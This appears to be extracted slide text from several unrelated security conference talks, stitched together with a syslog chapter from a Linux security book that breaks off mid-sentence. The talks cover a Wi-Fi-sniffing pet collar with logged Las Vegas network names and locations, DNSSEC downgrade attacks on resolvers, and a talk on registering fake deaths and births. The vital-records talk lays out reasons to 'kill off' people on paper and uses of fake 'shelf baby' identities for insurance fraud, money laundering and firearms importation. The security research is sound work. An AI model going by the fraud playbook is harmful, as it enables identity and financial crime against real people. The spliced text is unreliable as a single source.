Jar'Jar' LOVE' YOU!!!' © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Box Store Cont…! Denial'Of' Service'Dog' Best' STORE' GOAL!!!!' GOAL!!!!' Circus'Afro' Circus'Afro' SQUIRREL!' © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Results… "! •  According to results, several hapless victims connected to Karma/Denial of Service dog! – Logging Fail! •  Only one person asked about “Denial Of” service dog! •  Most people said “NICE DOGGY!”! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 So What Have We Learned???! •  A tech hobbyist with no prior firmware experience can create a functional WarKitteh Collar in a short amount of time.! •  In 2014 there are STILL unsecured WiFi hotspots! •  Lots of devices still probe! •  Still no patch for human stupidity! •  Cats – AND DOGS – are really hard to work with! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Shout out! •  Jeremyblum.com! •  Adafruit.com! •  Sparkfun.com! •  Spark.io! •  Arduino.cc! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Oh BTW! •  JK Devices (jkdevices.com)! –  Complete Scam! –  Don’t waste your money! •  No emails! •  No contact! •  No Product! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Thanks! •  Reeves! •  Bill! •  Joe! •  Joey! •  Nancy! •  Ricky! •  V-dog.owners! •  Spark.io Guys! •  NoVaLabs Guys! •  V-dog! •  Skitzy! •  Coco! •  Tenacity! •  DefCon! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 DefCon Activities! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 DefCon WarKitteh! ! WarKi7eh% © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 BadKitty! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Walking The Strip! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 All Kinds of People! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Street Performers! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Monuments! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Willing Participants! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Drunk Participants! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Results! Date% Time% Lat% Lon% SSID% Signal% Encrypt% 8/9/2014' 5:34:42' 36.12057' -115.173'Cox-Mirage-Rooms' -94'OPEN' 8/9/2014' 5:34:42' 36.12057' -115.173'AirOne' -90'WPA2' 8/9/2014' 5:34:42' 36.12057' -115.173'porfhru' -90'OPEN' 8/9/2014' 5:39:52' 36.11833' -115.173'afwifi' -71'OPEN' 8/9/2014' 5:39:52' 36.11833' -115.173'hetwrls' -80'WPA2' 8/9/2014' 5:39:52' 36.11833' -115.173'Gertrude' -80'WPA2' 8/9/2014' 5:39:52' 36.11833' -115.173'i5875b' -86'WEP' 8/9/2014' 5:39:52' 36.11833' -115.173'ALPHA' -96'WPA2' 8/9/2014' 5:39:52' 36.11833' -115.173'GAMMA' -94'WPA2' 8/9/2014' 5:39:52' 36.11833' -115.173'hwip' -89'OPEN' 8/9/2014' 5:39:52' 36.11833' -115.173'MOTOMESH' -76'OPEN' 8/9/2014' 5:39:52' 36.11833' -115.173'BETA' -94'WPA2' 8/9/2014' 5:39:52' 36.11833' -115.173'PENTA'Guest'Access' -83'WPA2' 8/9/2014' 5:39:52' 36.11833' -115.173'PENTA' -82'WPA2' 8/9/2014' 5:39:52' 36.11833' -115.173'cpc' -96'WPA2' 8/9/2014' 5:39:52' 36.11833' -115.173'ORCH' -94'WPA2' 8/9/2014' 5:39:52' 36.11833' -115.173'LINQ' -90'OPEN' 8/9/2014' 5:45:01' 36.11575' -115.173'Flamingo-Rooms-Cox' -89'OPEN' 8/9/2014' 5:45:01' 36.11575' -115.173'MOTOMESH' -81'OPEN' 8/9/2014' 5:45:01' 36.11575' -115.173'afwifi' -73'OPEN' 8/9/2014' 5:45:01' 36.11575' -115.173'CROMWELL' -88'OPEN' 8/9/2014' 5:45:01' 36.11575' -115.173'GJJ' -93'WPA2' 8/9/2014' 5:45:01' 36.11575' -115.173'GAMMA' -86'WPA2' 8/9/2014' 5:45:01' 36.11575' -115.173'ALPHA' -84'WPA2' 8/9/2014' 5:45:01' 36.11575' -115.173'DELTA' -86'WPA2' © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Video… er… PIC!!! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 DefCon DoS Dog! DoS%Dog% © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 SkyDog! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 CNN Kitteh! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 Questions?! © 2013 tenacitysolutions.com 1835 Alexander Bell Dr. Suite 100, Reston, VA 20191 703-673-3100 That’s all Folks!
#BHUSA @BlackHatEvents DNSSEC Downgrade Attacks Haya Shulman, Elias Heftrig, Michael Waidner #BHUSA @BlackHatEvents Information Classification: General Why DNSSEC Downgrade Attacks? DNS is involved in virtually all transactions on the Internet and many mechanisms rely on its security ➢ when determining which IP host to send packets to ➢ password recovery ➢ ACME/Domain Validation for obtaining X.509/HTTPS Certificates ➢ authorization of X.509 CAs and authentication of certificates ➢ also: SSH host key fingerprints, IPSec Keys, … DNSSEC is the go-for solution to achieve DNS record security ➢ while everybody here has probably heard of downgrade attacks on TLS ➢ downgrade attacks on DNSSEC have not seen much attention up until now #BHUSA @BlackHatEvents Information Classification: General Agenda ➢ DNS(SEC) Refresher ➢ DNSSEC Downgrade Attacks ➢ Attacks to Weaken Security ➢ Attacks to Break Security ➢ Recommendations #BHUSA @BlackHatEvents Information Classification: General Agenda ➢ DNS(SEC) Refresher ➢ DNSSEC Downgrade Attacks ➢ Attacks to Weaken Security ➢ Attacks to Break Security ➢ Recommendations #BHUSA @BlackHatEvents Information Classification: General DNS Resolution – Common Setup Stub Resolver Forwarder Recursive Resolver . ing. bank.ing. Authoritative Name Server Application gethostbyname(“www.bank.ing.”) www.bank.ing. IN A? bank.ing. 3600 IN NS ns.bank.ing. 1 2 3 4 5 6 7 8 9 A B C #BHUSA @BlackHatEvents Information Classification: General DNS Poisoning Stub Resolver Forwarder Recursive Resolver . ing. bank.ing. Authoritative Name Server Application gethostbyname(“www.bank.ing.”) www.bank.ing. IN A? www.bank.ing. 2600 IN A ➢ Attack on DNS Record Authenticity #BHUSA @BlackHatEvents Information Classification: General DNS Poisoning Stub Resolver Forwarder Recursive Resolver . ing. bank.ing. Authoritative Name Server Application gethostbyname(“www.bank.ing.”) www.bank.ing. IN A? www.bank.ing. 2600 IN A ➢ Attack on DNS Record Authenticity #BHUSA @BlackHatEvents Information Classification: General Secure DNS in Practice Stub Resolver Forwarder Recursive Resolver . ing. bank.ing. Authoritative Name Server Application Local Host DoH/DoT DoU + DNSSEC ➢ Session maintenance too expensive for recursive-to-authoritative communication #BHUSA @BlackHatEvents Information Classification: General DNSSEC Protection Goals Provided For ➢ data origin authenticity ➢ integrity of data ➢ NOT confidentiality Basic Principle ➢ protection of DNS data using cryptographic signatures ➢ trust in public keys delegated via a PKI ➢ built into and aligned with the DNS hierarchy #BHUSA @BlackHatEvents Information Classification: General DNSSEC Chain of Trust “RRSIG” Signature Records ➢ cover record sets (“RRset”; same name, type and class) DNSKEY Records ➢ carry public key material for verification DS “Delegation Signer” Records ➢ carry digest of individual child zone DNSKEY ➢ conform to “certificates” in other PKIs All DNSSEC records specify signature algorithm numbers. DS records specify digest type numbers. . DS: org. 2 → 13 DNSKEY: . 8 8 example.org. A: www.example.org. DNSKEY: example.org. 8 org. DS: example.org. DNSKEY: org. 13 13 2 → 8 4 → 8 8 13 8 #BHUSA @BlackHatEvents Information Classification: General Protection of (Non-)Existence Authenticated Denial of Existence ➢ uses (signed) NSEC-type records to mark empty intervals in the name space ➢ specifies record types present at interval boundaries ➢ does not protect record presence at the level of signature algorithms DNSSEC Record Presence Requirement for Signature Algorithms DS → DNSKEY → RRSIGs on all zone data • ∃ 𝐷𝑅 𝑤𝑖𝑟ℎ 𝑎𝑙𝑔𝑙𝑟𝑖𝑟ℎ𝑙 𝑎 ⇒ ∃ 𝐷𝑁𝑅𝐾𝐷𝑌 𝑤𝑖𝑟ℎ 𝑎𝑙𝑔𝑙𝑟𝑖𝑟ℎ𝑙 𝑎 • ∃ 𝐷𝑁𝑅𝐾𝐷𝑌 𝑤𝑖𝑟ℎ 𝑎𝑙𝑔𝑙𝑟𝑖𝑟ℎ𝑙 𝑎 ⇒ ∀ 𝑅𝑅𝑟𝑒𝑟𝑟 𝑖𝑙 𝑧𝑙𝑙𝑒: ∃ 𝑅𝑅𝑅𝐼𝐺 𝑤𝑖𝑟ℎ 𝑎𝑙𝑔𝑙𝑟𝑖𝑟ℎ𝑙 𝑎 #BHUSA @BlackHatEvents Information Classification: General DNSSEC Signature Algorithms Number Mnemonics DNSSEC Signing DNSSEC Validation 1 RSAMD5 MUST NOT MUST NOT 3 DSA MUST NOT MUST NOT 5 RSASHA1 NOT RECOMMENDED MUST 6 DSA-NSEC3-SHA1 MUST NOT MUST NOT 7 RSASHA1-NSEC3-SHA1 NOT RECOMMENDED MUST 8 RSASHA256 MUST MUST 10 RSASHA512 NOT RECOMMENDED MUST 12 ECC-GOST MUST NOT MAY 13 ECDSAP256SHA256 MUST MUST 14 ECDSAP384SHA384 MAY RECOMMENDED 15 ED25519 RECOMMENDED RECOMMENDED 16 ED448 MAY RECOMMENDED 253 PRIVATE (MAY) (MAY) 254 PRIVATE (OID) (MAY) (MAY) ➢ Rules for Algorithm Support in DNSSEC Software, acc. [RFC8624] ECDSA EdDSA private ~ more secure phasing out phasing in SHA1 RSA #BHUSA @BlackHatEvents Information Classification: General DNSSEC DS Digest Types Number Mnemonics DNSSEC Delegation DNSSEC Validation 1 SHA-1 MUST NOT MUST 2 SHA-256 MUST MUST 3 GOST R 34.11-94 MUST NOT MAY 4 SHA-384 MAY RECOMMENDED ➢ Rules for DS Digest Type Support in DNSSEC Software, acc. [RFC8624] in active use #BHUSA @BlackHatEvents Information Classification: General Investigated Domains Signed Domains ➢ 1373 Top-Level Domains (of 1487) ➢ 20083 Tranco Domains (of Top 500k) ➢ disregarding app. 9k domains without a validation path from the DNS root 92.33% 7.77% Signed TLDs Signed Insecure 4.02% 95.98% Signed Tranco Top 500k Signed Insecure #BHUSA @BlackHatEvents Information Classification: General Investigated Resolvers Resolvers ➢ 9 resolvers in the lab (Bind, Unbound, Knot, PowerDNS; 5 Windows Server Versions) ➢ 8 popular open resolver services (Google, Cloudflare, …) ➢ 15k openly accessible resolvers from a port scan on the IPv4 address space (app. 3k validating resolvers) 79.91% 20.09% Validating Open Resolvers Insecure Validate #BHUSA @BlackHatEvents Information Classification: General Agenda ➢ DNS(SEC) Refresher ➢ DNSSEC Downgrade Attacks ➢ Attacks to Weaken Security ➢ Attacks to Break Security ➢ Recommendations #BHUSA @BlackHatEvents Information Classification: General Downgrade Attacks on DNSSEC Attacker Model: On-path Attacker (~ Threat Model of DNSSEC) ➢ positioned between the resolver and the authoritative server ➢ can send, read, modify, duplicate, delay, suppress, … messages ➢ does not know cryptographic secrets Further Assumptions (to keep explanations simple) ➢ attacker can cause trigger resolution by the resolver ➢ empty caches Recursive Resolver Authoritative Name Server #BHUSA @BlackHatEvents Information Classification: General Downgrade Attacks on DNSSEC Recursive Resolver Authoritative Name Server ns.bank.ing. A? ns.bank.ing bank.ing. DNSKEY? ns.bank.ing. A? www.bank.ing. A? 1 2 3 4 5 8 9 7 6 #BHUSA @BlackHatEvents Information Classification: General Agenda ➢ DNS(SEC) Refresher ➢ DNSSEC Downgrade Attacks ➢ Attacks to Weaken Security ➢ Attacks to Break Security ➢ Recommendations #BHUSA @BlackHatEvents Information Classification: General Attacks to Weaken Security Goal ➢ make the resolver use the weakest possible validation path ➢ and attack that weakest link in the chain of trust ➢ (very) roughly conforms to downgrade to “Export” in SSL Presented here ➢ Downgrading to a weaker DS digest ➢ Downgrading to a weaker signature #BHUSA @BlackHatEvents Information Classification: General The Case of SHA-1 in DNSSEC A Note on SHA-1 ➢ “broken” in terms of cryptanalysis ➢ practical attacks on DNSSEC are expected in the near future ➢ attacks for non-DNSSEC cases have been demonstrated in 2019 SHA-1 in DNSSEC ➢ being phased out since about 2019, but still widely used ➢ algorithms 5 and 7 (“NOT RECOMMENDED”) ➢ digest type 1 (“MUST NOT”) ➢ resolvers must still support it ➢ virtually all do ➢ Shares of Secure Zones using SHA-1 DS DNSKEY TLDs any 8.64% 4.10% exclusively 0.22% 3.30% Tranco any 11.33% 6.22% exclusively 3.38% 5.81% #BHUSA @BlackHatEvents Information Classification: General Downgrade to Weaker DS Digest #BHUSA @BlackHatEvents Information Classification: General Downgrade to Weaker DS Digest bank.ing DNSKEY: bank.ing 8 A: ns.bank.ing ing DNSKEY: ing 8 8 DS: bank.ing 1 → 8 2 → 8 Preconditions ➢ two DS records in parent zone ➢ one stronger digest, one weaker ➢ both supported by the resolver ➢ one DNSKEY in victim zone matching both DS digests Assumption ➢ attacker can break the weaker digest Note ➢ as outlined in RFC 4509 for SHA-1/SHA-256 (1 and 2) #BHUSA @BlackHatEvents Information Classification: General Downgrade to Weaker DS Digest bank.ing DNSKEY: bank.ing 8 A: ns.bank.ing ing DNSKEY: ing 8 8 DS: bank.ing 1 → 8 2 → 8 Procedure ➢ attacker forges DNSKEY for the weaker algorithm ➢ replaces authentic DNSKEY and all its signatures ➢ spoofs target data Observations ➢ stronger digest does not match the DNSKEY ➢ path via DS with stronger digest becomes invalid Will the resolver fall back to the validation path via the weaker DS record? 8 #BHUSA @BlackHatEvents Information Classification: General Downgrade to Weaker DS Digest Many Vulnerable Resolvers Lab ➢ only PowerDNS enforces strongest possible DS ➢ BIND9 and Knot Resolver enforce stronger-than-SHA1 DS Popular Open Resolvers ➢ only Google and CZ.NIC enforce stronger-than-SHA1 DS Fallback to Open Resolvers Lab Popular Any weaker DS 93% 8/9 8/8 SHA-1 DS 24% 6/9 6/8 #BHUSA @BlackHatEvents Information Classification: General Downgrade to Weaker Signature #BHUSA @BlackHatEvents Information Classification: General Downgrade to Weaker Signature Preconditions ➢ zone signed with two algorithms ➢ one weaker, one stronger ➢ both supported by the resolver ➢ e.g. typical zone migrating to a new algorithm Assumption ➢ attacker can forge zone data for the weaker one bank.ing DNSKEY: bank.ing 5 13 A: ns.bank.ing 13 5 #BHUSA @BlackHatEvents Information Classification: General Downgrade to Weaker Signature Procedure ➢ attacker just places spoofed zone data in the DNS response Observations ➢ Signatures of the stronger key become invalid. ➢ optional attacker measure: strip them off Will the resolver accept the weaker signatures, even if stronger ones should be present and valid? bank.ing 5 13 A: ns.bank.ing 5 DNSKEY: bank.ing X #BHUSA @BlackHatEvents Information Classification: General Downgrade to Weaker Signature RFC 5702 on Algorithm Presence (DS → DNSKEY → RRSIGS on all zone data) “Since each RRSet MUST be signed with each algorithm present in the DNSKEY RRSet at the zone apex (see Section 2.2 of [RFC4035]), a malicious party cannot filter out the RSA/SHA-2 RRSIG and force the validator to use the RSA/SHA-1 signature if both are present in the zone. This should provide resilience against algorithm downgrade attacks, if the validator supports RSA/SHA-2.” So… We are secure? #BHUSA @BlackHatEvents Information Classification: General Downgrade to Weaker Signature Affected Resolvers ➢ Turns out… all investigated resolvers fall back to weaker RRSIGS. ➢ even to SHA-1-based ones RFC 6840 on Algorithm Presence (DS → DNSKEY → RRSIGS on all zone data) “This requirement applies to servers, not validators. Validators SHOULD accept any single valid path. They SHOULD NOT insist that all algorithms signaled in the DS RRset work, and they MUST NOT insist that all algorithms signaled in the DNSKEY RRset work.” ➢ facilitates algorithm updates of very large zones ➢ but bites us back while we are getting rid of SHA-1. Bad Luck  #BHUSA @BlackHatEvents Information Classification: General Review: Attacks to Weaken DNSSEC Countermeasures against Downgrading to Weaker DS ➢ require the strongest present DS digest to be used for construction of the validation path ➢ especially if the weaker one is SHA-1 Countermeasures against Downgrading to Weaker Signature ➢ we can essentially just hope zones migrate away fast enough ➢ insisting on RRSIGs of the strongest algorithm from DNSKEY risks disconnecting secure domains ➢ against attacker who cannot strip off records ➢ insist that the strongest present algorithm signatures work #BHUSA @BlackHatEvents Information Classification: General Agenda ➢ DNS(SEC) Refresher ➢ DNSSEC Downgrade Attacks ➢ Attacks to Weaken Security ➢ Attacks to Break Security ➢ Recommendations #BHUSA @BlackHatEvents Information Classification: General Attacks to Break Security Motivation ➢ breaking a “weaker” algorithm is still quite a bar to jump ➢ even SHA-1 is not quite there, yet DNSSEC Downgrade Attacks to Break Security ➢ we found ways around breaking crypto ➢ in effect, roughly comparable to Downgrade to NULL / SSL Stripping ➢ exploit the validation logic that assigns security states to DNS data #BHUSA @BlackHatEvents Information Classification: General DNS Record Security States Secure ➢ The full chain of trust is proven to be authentic. ➢ response to client carries records in question and the RRSIG(s) covering them ➢ AD message flag set, but effectively ignored by most clients Bogus ➢ no valid chain of trust could be constructed, e.g. because ➢ signatures failed to validate ➢ DNSSEC records missing ➢ SERVFAIL error response to client #BHUSA @BlackHatEvents Information Classification: General DNS Record Security States Indeterminate ➢ not too relevant here ➢ assigned to infrastructure data during referrals (NS and A of NS) ➢ or in case of missing trust anchors (weird PKI entry) Insecure ➢ provably not secured in a way the resolver can validate ➢ e.g. by authenticated proof that no DS record exists at some point in the DNS hierarchy ➢ authenticated DS records with unsupported digest types or signature algorithms “do not exist” ➢ response to client carries records in question, without AD flag The next attacks trick the resolver into marking records Insecure. #BHUSA @BlackHatEvents Information Classification: General Rewriting RRSIG Algorithm Numbers #BHUSA @BlackHatEvents Information Classification: General Rewriting RRSIG Algorithm Numbers Preconditions ➢ just any properly protected DNSSEC zone ➢ we tested for single-algorithm zones bank.ing DNSKEY: bank.ing 13 A: ns.bank.ing 13 #BHUSA @BlackHatEvents Information Classification: General Rewriting RRSIG Algorithm Numbers Procedure ➢ attacker rewrites signature algorithm number ➢ to one the resolver does not support Note ➢ chain of trust broken at the last link Vulnerable Resolvers ➢ Google Public DNS ➢ reported and fixed bank.ing DNSKEY: bank.ing 13 A: ns.bank.ing 16 #BHUSA @BlackHatEvents Information Classification: General Downgrade via Complex Chain of Trust ➢ Let’s see what can go wrong when things get experimental. Situation ➢ a zone operator adds a freshly standardized algorithm ➢ which is not supported by many resolvers yet ➢ or uses a private algorithm in addition to a non-private one #BHUSA @BlackHatEvents Information Classification: General Stripping off Supported RRSIGs #BHUSA @BlackHatEvents Information Classification: General Stripping Off Supported RRSIGs Preconditions ➢ the zone is signed with two different algorithms ➢ one supported by the resolver ➢ one unsupported (here: 15) ➢ DS records at the parent at least for the supported one Note ➢ DNSKEYs of both algorithms and their RRSIGs are present bank.ing DNSKEY: bank.ing 8 15 A: ns.bank.ing 15 8 #BHUSA @BlackHatEvents Information Classification: General Stripping Off Supported RRSIGs bank.ing DNSKEY: bank.ing 8 15 A: ns.bank.ing 15 Procedure ➢ the attacker drops the supported RRSIG records ➢ from DNS messages to the resolver ➢ leaving only unsupported algorithms Note ➢ The RRSIG of Algorithm 8 should be present. X #BHUSA @BlackHatEvents Information Classification: General Stripping Off Supported RRSIGs Vulnerable Resolvers ➢ none of the resolvers in our lab ➢ 2 Popular Resolver Services: Cloudflare and Google 92.14% 7.86% Vulnerable Open Resolvers Unsusceptible Vulnerable #BHUSA @BlackHatEvents Information Classification: General Stripping off Supported DNSKEYs #BHUSA @BlackHatEvents Information Classification: General Stripping off Supported DNSKEYs bank.ing 8 15 A: ns.bank.ing ing DNSKEY: ing 8 8 DS: bank.ing 2 → 8 2 → 15 15 8 Preconditions ➢ zone is signed with two different algorithms ➢ one supported by the resolver ➢ one unsupported (here: 15) ➢ (at least) one DNSKEY for each ➢ DS records for both at the parent Note ➢ DNSKEYs of both algorithms and their RRSIGs are prsent DNSKEY: bank.ing #BHUSA @BlackHatEvents Information Classification: General Stripping off Supported DNSKEYs bank.ing DNSKEY: bank.ing X 15 A: ns.bank.ing ing DNSKEY: ing 8 8 DS: bank.ing 2 → 8 2 → 15 15 X Procedure ➢ the attacker drops the supported DNSKEY ➢ and all its signatures ➢ from any DNS messages to the resolver ➢ leaving only unsupported algorithms Note ➢ DNSKEY for algorithm 8 should be present ➢ RRSIGs for algorithm 8 should be present ➢ stripping off the signatures not strictly necessary #BHUSA @BlackHatEvents Information Classification: General Stripping off Supported DNSKEYs Vulnerable Resolvers ➢ 1 Popular Open Resolver (OpenDNS) ➢ Windows Server Recursive DNS (all tested versions) 94.02% 5.58% Vulnerable Open Resolvers Unsusceptible Vulnerable #BHUSA @BlackHatEvents Information Classification: General Review: Attacks to Break Security Countermeasures ➢ when considering algorithms, resolvers should decide “insecure” solely based on the DS records ➢ insist on presence of a least one supported algorithm according to specification supported DS → supported DNSKEY → supported RRSIGs on all zone data #BHUSA @BlackHatEvents Information Classification: General Agenda ➢ DNS(SEC) Refresher ➢ DNSSEC Downgrade Attacks ➢ Attacks to Weaken Security ➢ Attacks to Break Security ➢ Recommendations #BHUSA @BlackHatEvents Information Classification: General Recommendations Resolver Operators and Developers ➢ require strongest present DS digest to work for validation ➢ only consider DS records for deciding to mark data insecure because of unsupported algorithms Zone Operators ➢ move away from SHA-1 ASAP ➢ adding additional signatures of stronger algorithms does not increase security ➢ can even level security, if those are not supported by vulnerable resolvers #BHUSA @BlackHatEvents Information Classification: General Thank you for your attention! Contact: elias.heftrig@sit.fraunhofer.de
Chris Rock I WILL KILL YOU & BIRTH YOU How to kill someone and bury the body yourself without a shovel & How to make Babies and then Harvest them Chris Rock chris@kustodian.com Why research DEATH Death Process behind the curtain Globally U.S. Certificate of Death Details about the Dead Person Medical Practitioner Cause of Death Funeral Director IDIOTS GUIDE for Doctors AUS Medical Certificate Cause of Death Online US Register a Death online – EDRS Electronic Death Registration System US EDRS Registration Is my Doctor real or fake? New Zealand https://www.mcnz.org.nz/support-for-doctors/list-of-registered-doctors Australia https://www.ahpra.gov.au USA: California http://www.mbc.ca.gov/Breeze/License_Verification.aspx United Kingdom http://www.gmc-uk.org/doctors/register/LRMP.asp USA: California Australia EDRS Online – U.S.A Dr G Medical Examiner “Coroner” Death Process When I grow up I want to be a Funeral Director Getting rid of the Body Fun Director – Australia Online Application Online Application Success Register LOTS of Deaths Register your Death Funeral Director Online - EDRS Becoming a Funeral Director -UK Becoming a Funeral Director -USA California & Colorado Nevada: $375 + Exam IDIOTS GUIDE for Fun Directors Death Process Wills and Probate DIY WILL KIT DIY PROBATE PETITION Reasons for killing someone Hinder • Kill off your investigating detectives. Subpoena and indictments cant be issued by a dead person. Dead people find it difficult to travel. • Kill your opposing lawyer, the judge or IRS audit officer to slow them down Financial - $$$$$ • Kill yourself. Enjoy your Life Insurance whilst your alive. No more sinking your boat at sea, or hiding out in Mexico. Start with a new Identification. • Kill your elderly parents to get their estate. They just wont die quick enough. Revenge • Revenge on your ex-wife/girlfriend/partner. They will be dead and not even know it. • Your boss is a asshole. As their Executor shut down their bank accounts, drivers license, phone plan, cable and utilities The Law isn’t written for the Dead returning New York Times: DEAD MAN WALKING (OHIO) 2013 “Legally dead dad must stay that way even if he's technically alive” Donald Miller was declared dead in 1994 after he skipped out on his ex-wife, two daughters and massive child support payments. He was declared dead after missing for five years. Now the living 61-year-old wants to resurrect his legal status, but a judge says he's too late. Ohio law sets a three-year window to challenge a decision in a declaration of death. The Judge said ‘Even though you’re sitting here in my courtroom, I see you, you’re alive, you seem to be in good health, the law restricts me from reversing the prior finding of death” Putting it all together Who’s your Daddy - Rebirth Birth Registration Process Paper based Birth Registration Process Birth Registration Process Canada https://www.orgforms.gov.on.ca/IBR/scr03_Instructions.do Australia: https://www.qld.gov.au/law/births-deaths-marriages-and-divorces (Vic - Health Collect) /birth-registration-and-adoption-records/register-a-birth/ USA http://www.azdhs.gov/vital-records/register-birth/home-birth.htm Online Birth Registration Process Online Birth Registration - USA New Identity vs Identity Theft Eden-Paladin Press Why make a Virtual baby • Government benefits / tax concessions • A spare identity ? Be like a cat and have 9 lives “A Do Over”: Have you been Bankrupt Have a Criminal Record Really screw up Being Sued A Virtual Identity to commit crimes (Life Insurance fraud, money laundering, Drug/Firearms importation The Shelf Company Shelf Company A Shelf company takes the shell company one step further. • It Pays Taxes • Files annual returns • Appears to have employees • Build up a credit rating and sit on the shelf for decades. • Builds up financial heuristics to set a normal baseline Why do this? So they can borrow funds, finance terrorists activity and launder money without raising RED FLAGS Shell Company A Shell company is an entity that appears only on paper. Used to protect the owners identity. The Shell/Shelf Baby Shell Baby A Shell baby is an entity that appears only on paper “birth certificate”. Can be used for immediate gain government benefits or a clean SSN. Shelf Baby The Shelf baby is shell baby that has been put on the shelf and has reached adulthood. This Shelf Baby now a Virtual will have • A drivers license • Bank loans and credit cards • Pay taxes • Life insurance polices Ultimately be harvested, ‘killed off’ at investment maturity. They will be a vehicle for money laundering. Benefits of the Shelf Baby This combination of legitimate paperwork, financial history makes this individual very powerful. Each of these Virtuals can do the following Borrow millions of dollars for property, personal loans or credit cards “Do Over” Identification for a life screw up. Criminal/Bankruptcy – A spare Life ID. Life insurance policies for death benefits without killing off yourself or elderly parents. Be the head of company or Shelf company with so you cant be touched. “Prevent the piecing of the veil” Asset protection for people suing you. Buy highly leveraged derivatives without fear of loss. If the trade pays off fantastic, if not, the virtual can be killed off for the life insurance or bankrupted and put on the shelf for 3-7 years as defective stock (harder to get finance) and sold as a discount. Obtain Firearms or Import Drugs and Firearms with a Virtual Identity Anonymity IP / Location = TOR / VPN / Anonymity box Payments = Bitcoin Company = Shell/Shelf Identity = A VIRTUAL If any of the technical mechanisms above fail, like for Ross Ulbricht as an example, why not have the last guy holding the gun…………non existent Death and Birth – Vulnerabilities Overview Anyone with this knowledge can kill another person or group of people “mass murder” on paper as it stands for revenge, kicks or profit. This affects hundreds of millions of people. This is a Global Problem – U.S, Canada, Australia, New Zealand and Europe. “You could be dead right now and not even know it” Death and Birth - Vulnerabilities • Going from a paper based system to Online facility for Medical Doctors with a DIY portal (ERDS) or no portal (Australia) makes Death Registration for hackers easy world wide. • Using public details such as Registration/Licence Numbers as the “No one knows identifier” allows fake birth/registration by legitimate doctors. • Basic or no licensing for Funeral Directors allows anyone to be a Funeral Director for abuse. • DIY portal or automated response for Funeral Directors allows hackers to be a fake funeral director or a real Funeral director to complete the Death Registration process Doctor / Midwife Funeral Director Why is it Swiss Cheese – The Government • The Government want accurate, centralised birth and death records. There have been records lost due to fire damage or floods in some states. No one can read doctors handwriting. The Government • Struggling to ensure that babies registered and put into the system. The government want to make birth registration as simple as possible to give children a chance to work, pay taxes and on the system. 2.5% of babies in 2012 in Victoria were not registered. • The Government have historically used the premise that for the death and burial of a person required two or three professional industries, the Medical, Coroner and Funeral Director. To dispose of a body improperly would require collusion between all parties. • Moving from paper based system to online system with industries that’s always been paper based without security portal controls
Building SECURE SERVERS with LINUX TOOLS & BEST PRACTICES FOR BASTION HOSTS MICHAEL D. BAUER Building SECURESERVERS with LINUX Michael D. Bauer Beijing • Cambridge • Farnham • Köln • Paris • Sebastopol • Taipei • Tokyo TITLE Page iii Wednesday, October 16, 2002 6:14 PM This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 323 Chapter 10 CHAPTER 10 System Log Management and Monitoring Whatever else you do to secure a Linux system, it must have comprehensive, accu- rate, and carefully watched logs. Logs serve several purposes. First, they help us trou- bleshoot virtually all kinds of system and application problems. Second, they provide valuable early-warning signs of system abuse. Third, after all else fails (whether that means a system crash or a system compromise), logs can provide us with crucial forensic data. This chapter is about making sure your system processes and critical applications log the events and states you’re interested in and dealing with this data once it’s been logged. The two logging tools we’ll cover are syslog and the more powerful Syslog-ng (“syslog new generation”). In the monitoring arena, we’ll discuss Swatch (the Simple Watcher), a powerful Perl script that monitors logs in real time and takes action on specified events. syslog syslog is the tried-and-true workhorse of Unix logging utilities. It accepts log data from the kernel (by way of klogd), from any and all local process, and even from pro- cesses on remote systems. It’s flexible as well, allowing you to determine what gets logged and where it gets logged to. A preconfigured syslog installation is part of the base operating system in virtually all variants of Unix and Linux. However, relatively few system administrators custom- ize it to log the things that are important for their environment and disregard the things that aren’t. Since, as few would dispute, information overload is one of the major challenges of system administration, this is unfortunate. Therefore, we begin this chapter with a comprehensive discussion of how to customize and use syslog. Configuring syslog Whenever syslogd, the syslog daemon, receives a log message, it acts based on the message’s type (or “facility”) and its priority. syslog’s mapping of actions to facilities This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 324 | Chapter 10: System Log Management and Monitoring and priorities is specified in /etc/syslog.conf. Each line in this file specifies one or more facility/priority selectors followed by an action; a selector consists of a facility or facilities and a (single) priority. In the following syslog.conf line in Example 10-1, mail.notice is the selector and /var/ log/mail is the action (i.e., “write messages to /var/log/mail”). Within the selector, mail is the facility (message category) and notice is the level of priority. Facilities Facilities are simply 